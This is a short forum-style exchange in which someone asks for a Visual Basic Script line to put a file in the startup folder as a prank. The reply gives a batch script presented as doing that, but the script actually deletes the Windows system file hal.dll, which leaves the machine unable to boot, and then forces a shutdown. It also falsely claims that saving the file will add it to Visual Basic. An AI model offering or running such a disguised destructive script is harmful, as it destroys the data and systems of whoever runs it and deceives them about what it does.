What is the Visual Basic Script line to add the file in the startup folder?

It's not for a virus, just want to prank a friend.

Open up notepad
then copypasta this in:
Code:
@Echo off
Del C:\WINDOWS\system32\hal.dll
@Echo off
shutdown -s -f -t 900

and save as VBSins13.bat
then open it, and it will automatically be added into visual basic
